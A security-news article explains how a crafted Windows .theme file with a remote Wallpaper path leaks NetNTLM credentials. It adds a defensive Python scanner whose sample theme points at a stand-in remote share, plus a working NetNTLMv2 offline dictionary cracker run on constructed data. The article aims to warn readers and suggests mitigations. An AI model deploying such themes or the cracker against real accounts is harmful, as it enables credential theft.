Here’s Why You Should Think Twice About Downloading Windows 10 Custom Themes

Windows Themes
Imagine this—you're having a good day, your PC is running smoothly, and you decide to install a custom Windows 10 theme, but then all of a sudden things go wrong. Very wrong. As in, you find out your Microsoft account has been compromised, but how can that be? Well, it might have been that custom Windows theme you downloaded and installed.

Like practically everything else software related, Windows themes can be a vector for remote miscreants to compromise your digital well-being. To be more specific, security researcher Jimmy Bayne (@bohops on Twitter) warns that custom Windows themes can be leveraged to conduct a so-called 'Pass-the-Hash' attack. The label is loose: what a malicious theme actually exposes is a NetNTLM challenge-response derived from the user's password (Bayne himself calls it netNTLM hash disclosure), which an attacker can capture and crack offline or relay elsewhere, rather than the raw NT hash that a textbook pass-the-hash replays.

Windows Theme Login

"Using a Windows .theme file, the Wallpaper key can be configured to point to a remote auth-required http/s resource. When a user activates the theme file (e.g. opened from a link/attachment), a Windows cred prompt is displayed to the user," Bayne explains.

"The wallpaper key is located under the 'Control Panel\Desktop' section of the .theme file. Other keys may possibly be used in the same manner, and this may also work for netNTLM hash disclosure when set for remote file locations," Bayne continues.

This ties into the ability of Windows users to create personalized themes with custom colors, sounds, and so forth. A theme is an INI-style text file with a .theme extension, saved under %LocalAppData%\Microsoft\Windows\Themes, and Windows can also bundle it together with its wallpapers into a shareable .deskthemepack file for posting on the web (or sending as an email attachment). Either file type applies the theme when the user double-clicks it.
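As an added example (not code from the article or from Bayne's research), the following Python scanner parses the INI-style .theme format described above and flags any value, under [Control Panel\Desktop] or any other section, that points at a UNC path or an http(s) URL, which is exactly the kind of reference that makes Windows reach out to a remote host when the theme is applied. The two sample themes embedded in it are constructed for the demonstration; the host and path names in them are placeholders.

```python
"""Flag Windows .theme files whose resource paths point at a remote host.

Added example (not from the article or from Bayne's research): a small scanner
for the INI-style .theme format. The sample theme contents below are constructed.
"""
import configparser
import re
from pathlib import Path

# A remote reference is a UNC path (\\host\share\...) or an http(s) URL. Either
# one makes Windows contact that host when the theme is applied, which is where
# an NTLM authentication attempt or a credential prompt comes from.
REMOTE_REF = re.compile(r"^\s*(?:\\\\|https?://)", re.IGNORECASE)

# Constructed sample: a benign theme whose wallpaper is a local file.
BENIGN_THEME = r"""
[Theme]
DisplayName=Company Blue

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=%ResourceDir%\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
"""

# Constructed sample: the Wallpaper key points at a remote share and the
# slideshow folder at a web server, the pattern the article describes.
SUSPICIOUS_THEME = r"""
[Theme]
DisplayName=Free Premium Theme

[Control Panel\Desktop]
Wallpaper=\\198.51.100.23\share\wallpaper.jpg
TileWallpaper=0
WallpaperStyle=10

[Slideshow]
ImagesRootPath=https://example.invalid/themes/pictures
Interval=1800
"""


def find_remote_references(theme_text: str) -> list[tuple[str, str, str]]:
    """Return (section, key, value) for every value that names a remote resource."""
    # RawConfigParser does no %-interpolation, which matters because .theme
    # values are full of %SystemRoot%-style variables. strict=False tolerates
    # repeated keys, which hand-edited themes sometimes contain.
    parser = configparser.RawConfigParser(strict=False, allow_no_value=True)
    parser.optionxform = str  # keep key case so findings read "Wallpaper", not "wallpaper"
    parser.read_string(theme_text)
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if value and REMOTE_REF.match(value):
                findings.append((section, key, value.strip()))
    return findings


def load_theme_text(path: Path) -> str:
    """Themes saved by Windows are usually UTF-16 LE with a BOM; hand-written ones are often UTF-8 or ANSI."""
    raw = path.read_bytes()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    try:
        return raw.decode("utf-8-sig")
    except UnicodeDecodeError:
        return raw.decode("cp1252")


def scan_theme_file(path: Path) -> list[tuple[str, str, str]]:
    """Convenience wrapper: decode a .theme file from disk and scan it."""
    return find_remote_references(load_theme_text(path))


if __name__ == "__main__":
    import sys

    paths = [Path(p) for p in sys.argv[1:]]
    if not paths:  # no files given: run against the constructed samples
        for name, text in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
            print(name, find_remote_references(text))
    for p in paths:
        for section, key, value in scan_theme_file(p):
            print(f"{p}: [{section}] {key} -> {value}")
```

Run it with no arguments to see the two constructed samples scored, or pass one or more .theme paths. A .themepack or .deskthemepack is a cabinet archive, so extract it first (expand.exe does the job on Windows) and point the scanner at the .theme inside. A hit is not proof of malice, since some organizations legitimately host wallpapers on a file share, but a theme from an untrusted source that references any remote host deserves a hard look before it is applied.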

What the security researcher discovered is that a specially crafted theme can coax Windows into giving up a user's login credentials. When the theme is applied, Windows tries to fetch the wallpaper from whatever location the Wallpaper key names. If that location is an attacker-controlled server that demands authentication, Windows either attempts NTLM authentication on its own, disclosing a NetNTLM challenge-response derived from the user's password, or shows the user a Windows credential prompt to fill in. Either way the attacker ends up with material that can be cracked. This is especially problematic when the user signs in with a Microsoft account rather than just a local account, because the password recovered from that material is the Microsoft account password, and it opens the user's online services as well as the PC.

Even though the password itself is never sent in the clear, the captured challenge-response can be attacked offline, and weak passwords fall quickly. To wit, the folks at Bleeping Computer said it took around 4 seconds to crack an "easy password" captured this way. The per-session challenges rule out precomputed tables, so the cost is set by password strength alone: a long, random password stays out of reach, while a dictionary word with a year tacked on does not.
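To make the cracking step concrete, here is an added Python example (not from the article or from Bleeping Computer's test) that builds the NetNTLMv2 computation from its parts and runs a dictionary attack against a captured response. Everything presented as a capture is constructed inside the block: the username, the 8-byte server challenge, the client blob and the resulting NTProofStr are produced by simulate_capture() for a hypothetical weak password, standing in for what a rogue SMB or HTTP server would log when the theme is applied.

```python
"""Offline dictionary attack on a captured NetNTLMv2 response.

Added example, not from the article: shows what an attacker's server actually
receives when Windows authenticates to a theme's remote wallpaper (a NetNTLMv2
challenge-response, not a reusable hash) and why a weak password falls in
seconds. All "captured" values below are constructed in simulate_capture().
"""
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks md4 on OpenSSL 3 builds."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    # Pad to 56 mod 64 bytes, then append the bit length as a little-endian 64-bit integer.
    padded = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(padded), 64):
        x = struct.unpack("<16I", padded[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE password. This is what true pass-the-hash replays."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, username: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain in UTF-16LE."""
    return hmac.new(nt_hash(password), (username.upper() + domain).encode("utf-16-le"), "md5").digest()


def nt_proof_str(password: str, username: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr, the 16 bytes the client sends: HMAC-MD5(NTOWFv2, server_challenge || blob)."""
    return hmac.new(ntlmv2_hash(password, username, domain), server_challenge + blob, "md5").digest()


def crack_netntlmv2(captured_proof, username, domain, server_challenge, blob, wordlist):
    """Recompute NTProofStr for each candidate; the first match is the password, else None."""
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof_str(candidate, username, domain, server_challenge, blob), captured_proof):
            return candidate
    return None


# ---- constructed stand-in for a capture (what a rogue SMB/HTTP server would log) ----
USERNAME, DOMAIN = "alice", "DESKTOP-7Q2K1"  # hypothetical victim account and machine name
SERVER_CHALLENGE = bytes.fromhex("a1b2c3d4e5f60718")  # 8-byte challenge picked by the rogue server
# NTLMv2 client blob (MS-NLMP "temp"): version, reserved, timestamp, client
# challenge, reserved, AV pairs, reserved. Bytes are constructed; the cracker
# only needs the exact bytes that went over the wire.
BLOB = bytes.fromhex(
    "01010000"              # RespType=1, HiRespType=1, 2 reserved bytes
    "00000000"              # reserved
    "00d0c1e2b7f6d601"      # timestamp (FILETIME)
    "0f1e2d3c4b5a6978"      # client challenge
    "00000000"              # reserved
    "02000600440045005300"  # AV_PAIR MsvAvNbDomainName = "DES"
    "00000000"              # AV_PAIR MsvAvEOL
    "00000000"              # reserved
)


def simulate_capture(real_password: str) -> bytes:
    """Produce the NTProofStr the victim's machine would have sent (constructed capture)."""
    return nt_proof_str(real_password, USERNAME, DOMAIN, SERVER_CHALLENGE, BLOB)


if __name__ == "__main__":
    captured = simulate_capture("Summer2020")  # hypothetical weak password
    wordlist = ["letmein", "Password1", "qwerty", "Summer2020", "correcthorse"]
    print("NT hash of 'password':", nt_hash("password").hex())
    print("recovered:", crack_netntlmv2(captured, USERNAME, DOMAIN, SERVER_CHALLENGE, BLOB, wordlist))
```

The point to notice is where the password enters: only through the NT hash that keys the two HMAC-MD5 steps. That is why the attacker must guess candidates rather than replay the capture as in pass-the-hash, and why a password covered by a dictionary or a cheap mask gives way in seconds while a long random one does not.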

Bayne said he let Microsoft know about his discovery a while back, but it was never patched because from Microsoft's vantage point, it is a "feature by design." How lovely. That being the case, be extra cautious about downloading and applying custom Windows themes. Administrators can also blunt the technique without waiting on Microsoft: block outbound SMB (TCP 445) at the network edge, set the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy to deny so Windows does not volunteer credentials to arbitrary hosts, and reassociate the .theme, .themepack and .deskthemepack extensions with a harmless program so a stray double-click on an attachment does not apply the theme.